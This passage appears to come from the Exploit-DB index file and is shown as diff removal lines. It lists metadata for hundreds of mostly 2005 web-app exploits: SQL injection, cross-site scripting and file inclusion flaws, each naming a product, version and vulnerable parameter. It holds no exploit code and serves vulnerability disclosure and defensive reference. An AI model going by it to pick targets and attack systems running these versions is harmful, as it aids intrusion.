-26758,exploits/php/webapps/26758.txt,"DRZES Hms 3.2 - 'login.php' Cross-Site Scripting",2005-12-07,Vipsta,php,webapps, -26759,exploits/asp/webapps/26759.txt,"ASPMForum - 'forum.asp?baslik' SQL Injection",2005-12-07,dj_eyes2005,asp,webapps, -26760,exploits/asp/webapps/26760.txt,"ASPMForum - 'kullanicilistesi.asp?harf' SQL Injection",2005-12-07,dj_eyes2005,asp,webapps, -26761,exploits/cgi/webapps/26761.txt,"Dell TrueMobile 2300 - Remote Credential Reset",2005-12-07,TNull,cgi,webapps, -26763,exploits/cfm/webapps/26763.txt,"Magic List Pro - 'view_archive.cfm?ListID' SQL Injection",2005-12-08,r0t,cfm,webapps, -26764,exploits/cfm/webapps/26764.txt,"Magic Forum Personal - 'view_forum.cfm?ForumID' SQL Injection",2005-12-08,r0t,cfm,webapps, -26765,exploits/cfm/webapps/26765.txt,"Magic Forum Personal - 'view_thread.cfm' Multiple SQL Injections",2005-12-08,r0t,cfm,webapps, -26766,exploits/cfm/webapps/26766.txt,"CF_Nuke 4.6 - 'index.cfm' Local File Inclusion",2005-12-08,r0t,cfm,webapps, -26767,exploits/cfm/webapps/26767.txt,"CF_Nuke 4.6 - 'index.cfm' Cross-Site Scripting",2005-12-08,r0t,cfm,webapps, -26770,exploits/php/webapps/26770.txt,"MilliScripts 1.4 - 'register.php' Cross-Site Scripting",2005-12-08,"Security Nation",php,webapps, -26771,exploits/cgi/webapps/26771.txt,"Nortel SSL VPN 4.2.1.6 - Web Interface Input Validation",2005-12-08,"Daniel Fabian",cgi,webapps, -26772,exploits/cfm/webapps/26772.txt,"Magic Book Professional 2.0 - 'Book.cfm' Cross-Site Scripting",2005-12-12,r0t,cfm,webapps, -26777,exploits/asp/webapps/26777.txt,"LocazoList Classifieds 1.0 - 'SearchDB.asp' Input Validation",2005-12-12,r0t3d3Vil,asp,webapps, -26778,exploits/jsp/webapps/26778.txt,"BlackBoard Academic Suite 6.2.3.23 - Frameset.jsp Cross-Domain Frameset Loading",2005-12-12,dr_insane,jsp,webapps, -26780,exploits/php/webapps/26780.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-QuickSearch.php' Cross-Site Scripting",2005-12-12,Preddy,php,webapps, -26781,exploits/php/webapps/26781.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-BrowseResources.php' Cross-Site Scripting",2005-12-12,Preddy,php,webapps, -26782,exploits/php/webapps/26782.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-AdvancedSearch.php' Cross-Site Scripting",2005-12-12,Preddy,php,webapps, -26783,exploits/php/webapps/26783.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-UserLogin.php' SQL Injection",2005-12-12,Preddy,php,webapps, -26784,exploits/php/webapps/26784.txt,"BTGrup Admin WebController - SQL Injection",2005-12-12,khc@bsdmail.org,php,webapps, -26785,exploits/php/webapps/26785.txt,"Arab Portal 2.0 - 'Link.php' SQL Injection",2005-12-12,stranger-killer,php,webapps, -26786,exploits/cgi/webapps/26786.txt,"EveryAuction 1.53 - Auction.pl Cross-Site Scripting",2005-12-13,$um$id,cgi,webapps, -26787,exploits/php/webapps/26787.txt,"phpCOIN 1.2.2 - CCFG[_PKG_PATH_DBSE] Remote File Inclusion",2005-12-13,retrogod@aliceposta.it,php,webapps, -26788,exploits/php/webapps/26788.txt,"PHPCOIN 1.2.2 - '/includes/db.php?$_CCFG[_PKG_PATH_DBSE]' Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps, -26789,exploits/php/webapps/26789.txt,"EncapsGallery 1.0 - 'gallery.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps, -26790,exploits/php/webapps/26790.txt,"PHPWebGallery 1.3.4/1.5.1 - 'comments.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps, -26791,exploits/php/webapps/26791.txt,"PHPWebGallery 1.3.4/1.5.1 - 'category.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps, -26792,exploits/php/webapps/26792.txt,"PHPWebGallery 1.3.4/1.5.1 - 'picture.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps, -26793,exploits/php/webapps/26793.txt,"Plogger Beta 2 - 'index.php?id' SQL Injection",2005-12-13,r0t,php,webapps, -26794,exploits/php/webapps/26794.txt,"Plogger Beta 2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-13,r0t,php,webapps, -26795,exploits/php/webapps/26795.txt,"VCD-db 0.9x - 'search.php?by' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps, -26796,exploits/php/webapps/26796.txt,"VCD-db 0.9x Search Module - 'batch' Cross-Site Scripting",2005-12-13,r0t3d3Vil,php,webapps, -26797,exploits/php/webapps/26797.txt,"PHP JackKnife 2.21 - Cross-Site Scripting",2005-12-13,r0t3d3Vil,php,webapps, -26798,exploits/php/webapps/26798.txt,"Mantis 0.x/1.0 - 'View_filters_page.php' Cross-Site Scripting",2005-12-13,r0t,php,webapps, -26799,exploits/php/webapps/26799.txt,"Snipe Gallery 3.1.4 - 'view.php?gallery_id' SQL Injection",2005-12-13,r0t,php,webapps, -26800,exploits/php/webapps/26800.txt,"Snipe Gallery 3.1.4 - 'image.php?image_id' SQL Injection",2005-12-13,r0t,php,webapps, -26801,exploits/php/webapps/26801.txt,"Snipe Gallery 3.1.4 - 'search.php?keyword' Cross-Site Scripting",2005-12-13,r0t,php,webapps, -27438,exploits/php/webapps/27438.txt,"Invision Power Services Invision Board 2.0.4 - Calendar Action Multiple Cross-Site Scripting Vulnerabilities",2006-03-17,Mr.SNAKE,php,webapps, -26804,exploits/php/webapps/26804.txt,"WordPress Plugin Spicy Blogroll - Local File Inclusion",2013-07-13,Ahlspiess,php,webapps, -26806,exploits/asp/webapps/26806.txt,"BMC Service Desk Express 10.2.1.95 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",asp,webapps, -26807,exploits/windows/webapps/26807.txt,"McAfee ePO 4.6.6 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",windows,webapps, -26808,exploits/php/webapps/26808.txt,"McGallery 1.0/1.1/2.2 - 'index.php?language' Traversal Local File Inclusion",2005-12-13,r0t,php,webapps, -26809,exploits/php/webapps/26809.txt,"McGallery 1.0/1.1/2.2 - 'show.php' Multiple SQL Injections",2005-12-13,r0t,php,webapps, -26810,exploits/php/webapps/26810.txt,"McGallery 1.0/1.1/2.2 - 'index.php?album' SQL Injection",2005-12-13,r0t,php,webapps, -26812,exploits/php/webapps/26812.txt,"PHP Web Scripts Ad Manager Pro 2.0 - 'Advertiser_statistic.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps, -26813,exploits/php/webapps/26813.txt,"Jamit Job Board 2.4.1 - 'index.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps, -26814,exploits/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - 'View_Results.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps, -26815,exploits/php/webapps/26815.txt,"CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,r0t3d3Vil,php,webapps, -26817,exploits/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Bypass",2005-12-14,"Maksymilian Arciemowicz",php,webapps, -26818,exploits/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,php,webapps, -26819,exploits/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,php,webapps, -26820,exploits/asp/webapps/26820.txt,"ASP-DEV XM Forum - 'forum.asp' Cross-Site Scripting",2005-12-14,Dj_Eyes,asp,webapps, -26821,exploits/asp/webapps/26821.txt,"ASPBB 0.4 - 'topic.asp?TID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps, -26822,exploits/asp/webapps/26822.txt,"ASPBB 0.4 - 'forum.asp?FORUM_ID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps, -26823,exploits/asp/webapps/26823.txt,"ASPBB 0.4 - 'profile.asp?PROFILE_ID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps, -26824,exploits/php/webapps/26824.txt,"WikkaWiki 1.1.6 - 'TextSearch.php' Cross-Site Scripting",2005-12-14,r0t,php,webapps, -26826,exploits/php/webapps/26826.txt,"Netref 3.0 - 'index.php' SQL Injection",2005-12-14,syst3m_f4ult,php,webapps, -26831,exploits/php/webapps/26831.txt,"QuickPayPro 3.1 - 'tracking.details.php?trackingid' SQL Injection",2005-12-14,r0t,php,webapps, -26832,exploits/php/webapps/26832.txt,"QuickPayPro 3.1 - 'sales.view.php?customerid' SQL Injection",2005-12-14,r0t,php,webapps, -26836,exploits/php/webapps/26836.txt,"Limbo CMS 1.0.4.2 - 'index.php?_SERVER[REMOTE_ADDR]' Cross-Site Scripting",2005-12-14,rgod,php,webapps, -26837,exploits/php/webapps/26837.txt,"Limbo CMS 1.0.4.2 - 'option' Traversal Arbitrary File Access",2005-12-14,rgod,php,webapps, -26838,exploits/php/webapps/26838.txt,"MarmaraWeb E-Commerce - 'index.php?page' Cross-Site Scripting",2005-12-15,B3g0k,php,webapps, -26839,exploits/php/webapps/26839.txt,"TML 0.5 - 'index.php?form' Cross-Site Scripting",2005-12-15,X1ngBox,php,webapps, -26840,exploits/php/webapps/26840.txt,"TML 0.5 - 'index.php?id' SQL Injection",2005-12-15,X1ngBox,php,webapps, -26841,exploits/php/webapps/26841.txt,"MarmaraWeb E-Commerce - Remote File Inclusion",2005-12-15,B3g0k,php,webapps, -26842,exploits/cgi/webapps/26842.txt,"Sitenet BBS 2.0 - 'netboardr.cgi' Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps, -26843,exploits/cgi/webapps/26843.txt,"Sitenet BBS 2.0 - 'search.cgi?cid' Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps, -26844,exploits/php/webapps/26844.txt,"DCForum 1-6 DCBoard Script - 'Page' Cross-Site Scripting",2005-12-15,r0t3d3Vil,php,webapps, -26845,exploits/cgi/webapps/26845.txt,"Atlant Pro 8.0.9 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps, -26846,exploits/cgi/webapps/26846.txt,"AltantForum 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps, -26847,exploits/cgi/webapps/26847.txt,"eDatCat 3.0 - EDCstore.pl Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps, -26848,exploits/cgi/webapps/26848.txt,"Soft4e ECW-Cart 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps, -26849,exploits/cgi/webapps/26849.txt,"ECTOOLS Onlineshop 1.0 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps, -26850,exploits/cgi/webapps/26850.txt,"PPCal Shopping Cart 3.3 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps, -26851,exploits/cgi/webapps/26851.txt,"Kryptronic ClickCartPro 5.1/5.2 - 'CP-APP.cgi' Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps, -26852,exploits/cgi/webapps/26852.txt,"Dick Copits PDEstore 1.8 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps, -26853,exploits/php/webapps/26853.txt,"EZDatabase 2.1.2 - 'index.php?p' Local File Inclusion",2005-12-16,r0t3d3Vil,php,webapps, -26854,exploits/php/webapps/26854.txt,"EZDatabase 2.1.2 - 'index.php?db_id' SQL Injection",2005-12-16,r0t3d3Vil,php,webapps, -26855,exploits/php/webapps/26855.txt,"IHTML Merchant Mall - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps, -26856,exploits/php/webapps/26856.txt,"IHTML Merchant 2.0 - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps, -26857,exploits/php/webapps/26857.txt,"PHP Arena PAFileDB Extreme Edition - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps, -26858,exploits/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - 'reply.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,r0t3d3Vil,cgi,webapps, -26859,exploits/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - 'stats.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,r0t3d3Vil,cgi,webapps, -26860,exploits/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - 'toc.pl?board' Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps, -26861,exploits/cgi/webapps/26861.txt,"ScareCrow 2.13 - 'forum.cgi?forum' Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps, -26862,exploits/cgi/webapps/26862.txt,"ScareCrow 2.13 - 'profile.cgi?user' Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps, -26863,exploits/cgi/webapps/26863.txt,"ScareCrow 2.13 - 'post.cgi?forum' Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps, -26864,exploits/cgi/webapps/26864.txt,"WebGlimpse 2.x - Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps, -26865,exploits/cgi/webapps/26865.txt,"WebCal 3.0 4 - 'webcal.cgi' Multiple Cross-Site Scripting Vulnerabilities",2005-12-16,"Stan Bubrouski",cgi,webapps, -26866,exploits/php/webapps/26866.txt,"Round Cube Webmail 0.1 -20051021 - Full Path Disclosure",2005-12-17,king_purba,php,webapps, -26867,exploits/php/webapps/26867.txt,"PHP Fusebox 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,"bogel & lukman",php,webapps, -26868,exploits/php/webapps/26868.txt,"jPORTAL 2.2.1/2.3 Forum - 'forum.php' SQL Injection",2005-12-19,Zbigniew,php,webapps, -26870,exploits/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps, -26871,exploits/php/webapps/26871.txt,"PlaySms 0.8 - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps, -26872,exploits/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,php,webapps, -26873,exploits/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - 'ID' SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps, -26874,exploits/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - 'acidcat.mdb' Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps, -26875,exploits/asp/webapps/26875.txt,"allinta CMS 2.3.2 - 'faq.asp?s' Cross-Site Scripting",2005-12-19,r0t3d3Vil,asp,webapps, -26876,exploits/asp/webapps/26876.txt,"allinta CMS 2.3.2 - 'search.asp?searchQuery' Cross-Site Scripting",2005-12-19,r0t3d3Vil,asp,webapps, -26877,exploits/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps, -26878,exploits/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps, -26879,exploits/php/webapps/26879.txt,"Cofax 2.0 - search.htm Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps, -26880,exploits/php/webapps/26880.txt,"FLIP 0.9.0.1029 - 'text.php?name' Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps, -26881,exploits/php/webapps/26881.txt,"FLIP 0.9.0.1029 - 'forum.php?frame' Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps, -26882,exploits/cfm/webapps/26882.txt,"Hot Banana Web Content Management Suite 5.3 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,cfm,webapps, -26883,exploits/php/webapps/26883.txt,"Libertas Enterprise CMS 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps, -26884,exploits/php/webapps/26884.txt,"Liferay Portal Enterprise 3.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps, -26885,exploits/php/webapps/26885.txt,"Lighthouse CMS 1.1 - Search Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps, -26888,exploits/ios/webapps/26888.txt,"FTP Sprite 1.2.1 iOS - Persistent Cross-Site Scripting",2013-07-16,Vulnerability-Lab,ios,webapps, -26890,exploits/ios/webapps/26890.txt,"Olive File Manager 1.0.1 iOS - Multiple Vulnerabilities",2013-07-16,Vulnerability-Lab,ios,webapps, -26893,exploits/php/webapps/26893.txt,"Dell Kace 1000 SMA 5.4.70402 - Persistent Cross-Site Scripting",2013-07-16,Vulnerability-Lab,php,webapps, -26894,exploits/php/webapps/26894.txt,"Saurus CMS 4.7.1 - Multiple Vulnerabilities",2013-07-16,waraxe,php,webapps, -26895,exploits/php/webapps/26895.txt,"Magnolia Search Module 2.1 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps, -26896,exploits/php/webapps/26896.txt,"ContentServ 3.0/3.1/4.0 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps, -26897,exploits/php/webapps/26897.txt,"Direct News 4.9 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps, -26898,exploits/php/webapps/26898.txt,"ODFaq 2.1 - 'faq.php' SQL Injection",2005-12-19,r0t,php,webapps, -26899,exploits/php/webapps/26899.txt,"Marwel 2.7 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps, -26900,exploits/php/webapps/26900.txt,"Miraserver 1.0 RC4 - 'index.php?page' SQL Injection",2005-12-19,r0t,php,webapps, -26901,exploits/php/webapps/26901.txt,"Miraserver 1.0 RC4 - 'newsitem.php?id' SQL Injection",2005-12-19,r0t,php,webapps, -26902,exploits/php/webapps/26902.txt,"Miraserver 1.0 RC4 - 'article.php?cat' SQL Injection",2005-12-19,r0t,php,webapps, -26903,exploits/asp/webapps/26903.txt,"Baseline CMS 1.95 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t,asp,webapps, -26904,exploits/php/webapps/26904.txt,"Bitweaver 1.1.1 Beta - 'list_galleries.php?sort_mode' Cross-Site Scripting",2005-12-19,r0t,php,webapps, -26905,exploits/php/webapps/26905.txt,"Bitweaver 1.1.1 - 'view_post.php?post_id' Cross-Site Scripting",2005-12-19,r0t,php,webapps, -26906,exploits/php/webapps/26906.txt,"Bitweaver 1.1.1 - 'view.php?blog_id' Cross-Site Scripting",2005-12-19,r0t,php,webapps, -26907,exploits/php/webapps/26907.txt,"Bitweaver 1.1.1 - 'message_box.php?sort_mode' Cross-Site Scripting",2005-12-19,r0t,php,webapps, -26908,exploits/php/webapps/26908.txt,"Bitweaver 1.1.1 - 'my.php?sort_mode' Cross-Site Scripting",2005-12-19,r0t,php,webapps, -26909,exploits/cfm/webapps/26909.txt,"Community Enterprise 4.x - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,cfm,webapps, -26910,exploits/cfm/webapps/26910.txt,"E-Publish 2.0 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,cfm,webapps, -26911,exploits/php/webapps/26911.txt,"Komodo CMS 2.1 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps, -26912,exploits/php/webapps/26912.txt,"Mercury CMS 4.0 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps, -26914,exploits/cgi/webapps/26914.txt,"Extensis Portfolio Netpublish Server 7.0 - Server.NP Directory Traversal",2005-12-20,"Andy Davis",cgi,webapps, -26916,exploits/php/webapps/26916.txt,"Enterprise Connector 1.0.2 - 'main.php' SQL Injection",2005-12-20,"Attila Gerendi",php,webapps, -26917,exploits/cgi/webapps/26917.txt,"LiveJournal - Cleanhtml.pl HTML Injection",2005-12-20,"Andrew Farmer",cgi,webapps, -26918,exploits/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Inclusion",2005-12-20,"Security .Net Information",php,webapps, -26919,exploits/php/webapps/26919.txt,"AbleDesign D-Man 3.0 - 'Title' Cross-Site Scripting",2005-12-20,$um$id,php,webapps, -26920,exploits/cfm/webapps/26920.txt,"Quick Square Development Honeycomb Archive 3.0 - 'CategoryResults.cfm' Multiple SQL Injections",2005-12-20,r0t3d3Vil,cfm,webapps, -26921,exploits/php/webapps/26921.txt,"Tolva 0.1 - 'Usermods.php' Remote File Inclusion",2005-12-21,xbefordx,php,webapps, -26923,exploits/php/webapps/26923.txt,"Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities",2005-12-21,"Alireza Hassani",php,webapps, -26924,exploits/jsp/webapps/26924.txt,"OpenEdit 4.0 - Results.HTML Cross-Site Scripting",2005-12-21,r0t3d3Vil,jsp,webapps, -26925,exploits/php/webapps/26925.txt,"Papaya CMS 4.0.4 - Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps, -26926,exploits/asp/webapps/26926.txt,"PortalApp 3.3/4.0 - 'login.asp' Cross-Site Scripting",2005-12-21,r0t,asp,webapps, -26927,exploits/asp/webapps/26927.txt,"SiteEnable 3.3 - 'login.asp' Cross-Site Scripting",2005-12-21,r0t,asp,webapps, -26928,exploits/asp/webapps/26928.txt,"IntranetApp 3.3 - 'login.asp?ret_page' Cross-Site Scripting",2005-12-21,r0t,asp,webapps, -26929,exploits/asp/webapps/26929.txt,"IntranetApp 3.3 - 'content.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t,asp,webapps, -26930,exploits/asp/webapps/26930.txt,"ProjectApp 3.3 - 'forums.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,asp,webapps, -26931,exploits/asp/webapps/26931.txt,"ProjectApp 3.3 - 'search_employees.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,asp,webapps, -26932,exploits/asp/webapps/26932.txt,"ProjectApp 3.3 - 'cat.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,asp,webapps, -26933,exploits/cgi/webapps/26933.txt,"ProjectApp 3.3 - 'links.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,cgi,webapps, -26934,exploits/asp/webapps/26934.txt,"ProjectApp 3.3 - 'pmprojects.asp?projectid' Cross-Site Scripting",2005-12-21,r0t,asp,webapps, -26935,exploits/asp/webapps/26935.txt,"ProjectApp 3.3 - 'login.asp?ret_page' Cross-Site Scripting",2005-12-21,r0t,asp,webapps, -26936,exploits/asp/webapps/26936.txt,"ProjectApp 3.3 - 'default.asp?skin_number' Cross-Site Scripting",2005-12-21,r0t,asp,webapps, -26937,exploits/cgi/webapps/26937.txt,"ComputerOil Redakto CMS 3.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,cgi,webapps, -26938,exploits/php/webapps/26938.txt,"Scoop 1.1 RC1 Search Module - Multiple Cross-Site Scriptings",2005-12-21,r0t3d3Vil,php,webapps, -26939,exploits/php/webapps/26939.txt,"Scoop 1.1 RC1 - Missing Story Error Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps, -26940,exploits/asp/webapps/26940.txt,"Commercial Interactive Media SCOOP! 2.3 - 'articleSearch.asp' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps, -26941,exploits/asp/webapps/26941.txt,"Commercial Interactive Media SCOOP! 2.3 - 'lostPassword.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps, -26942,exploits/asp/webapps/26942.txt,"Commercial Interactive Media SCOOP! 2.3 - 'account_login.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps, -26943,exploits/asp/webapps/26943.txt,"Commercial Interactive Media SCOOP! 2.3 - 'category.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps, -26944,exploits/asp/webapps/26944.txt,"Commercial Interactive Media SCOOP! 2.3 - 'articleZone.asp?Invalid' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps, -26945,exploits/asp/webapps/26945.txt,"Commercial Interactive Media SCOOP! 2.3 - 'prePurchaserRegistration.asp?Invalid' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps, -26946,exploits/asp/webapps/26946.txt,"Commercial Interactive Media SCOOP! 2.3 - 'requestDemo.asp?Invalid' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps, -26947,exploits/asp/webapps/26947.txt,"Sitekit CMS 6.6 - 'Default.aspx' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,asp,webapps, -26948,exploits/asp/webapps/26948.txt,"Sitekit CMS 6.6 - 'Request-call-back.html?ClickFrom' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps, -26949,exploits/asp/webapps/26949.txt,"Sitekit CMS 6.6 - 'registration-form.html?ClickFrom' Cross-Site Scripting",2005-12-21,r0t3d3Vil,asp,webapps, -26952,exploits/ios/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps, -26953,exploits/ios/webapps/26953.txt,"Flux Player 3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps, -26954,exploits/ios/webapps/26954.txt,"ePhoto Transfer 1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps, -26955,exploits/php/webapps/26955.txt,"Xibo 1.2.2/1.4.1 - 'index.php?p' Directory Traversal",2013-07-18,Mahendra,php,webapps, -26956,exploits/windows/webapps/26956.txt,"Dell PacketTrap MSP RMM 6.6.x - Multiple Cross-Site Scripting Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps, -26957,exploits/windows/webapps/26957.txt,"Dell PacketTrap PSA 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps, -26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,php,webapps, -26959,exploits/php/webapps/26959.txt,"Papoo 2.1.2 - 'index.php?menuid' SQL Injection",2005-12-21,r0t3d3Vil,php,webapps, -26960,exploits/php/webapps/26960.txt,"Papoo 2.1.2 - 'Guestbook.php?menuid' SQL Injection",2005-12-21,r0t3d3Vil,php,webapps, -26961,exploits/php/webapps/26961.txt,"Papoo 2.1.2 - 'print.php' Multiple SQL Injections",2005-12-21,r0t3d3Vil,php,webapps, -26962,exploits/php/webapps/26962.txt,"PHPSlash 0.8.1 - 'article.php' SQL Injection",2005-12-21,r0t3d3Vil,php,webapps, -26963,exploits/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise - 'news_and_events_new.asp?p_news_id' SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps, -26964,exploits/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise - 'news.asp?p_news_id' SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps, -26965,exploits/php/webapps/26965.txt,"MusicBox 2.3 - 'type' SQL Injection",2005-12-22,"Medo HaCKer",php,webapps, -26968,exploits/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps, -26969,exploits/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - 'Action' Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps, -26972,exploits/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps, -26973,exploits/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php?_load_article_details' SQL Injection",2005-12-27,"A. Ramos",php,webapps, -26974,exploits/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 - 'addresses_export.php?queues' SQL Injection",2005-12-27,"A. Ramos",php,webapps, -26975,exploits/php/webapps/26975.txt,"Cerberus Helpdesk 2.649 - 'display_ticket_thread.php?ticket' SQL Injection",2005-12-27,"A. Ramos",php,webapps, -26976,exploits/php/webapps/26976.txt,"Dev Web Management System 1.5 - 'getfile.php?cat' SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps, -26977,exploits/php/webapps/26977.txt,"Dev Web Management System 1.5 - 'download_now.php?target' SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps, -26978,exploits/php/webapps/26978.txt,"Dev Web Management System 1.5 - 'add.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,retrogod@aliceposta.it,php,webapps, -26979,exploits/php/webapps/26979.txt,"IceWarp Universal WebMail - '/accounts/inc/include.php' Multiple Remote File Inclusions",2005-12-27,"Tan Chew Keong",php,webapps, -26980,exploits/php/webapps/26980.txt,"IceWarp Universal WebMail - '/admin/inc/include.php' Multiple Remote File Inclusions",2005-12-27,"Tan Chew Keong",php,webapps, -26981,exploits/php/webapps/26981.txt,"IceWarp Universal WebMail - '/dir/include.html?lang' Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps, -26982,exploits/php/webapps/26982.txt,"IceWarp Universal WebMail - '/mail/settings.html?Language' Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps, -26983,exploits/php/webapps/26983.txt,"IceWarp Universal WebMail - '/mail/index.html?lang_settings' Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps, -26984,exploits/php/webapps/26984.txt,"IceWarp Universal WebMail - '/mail/include.html' Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps, -26986,exploits/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site 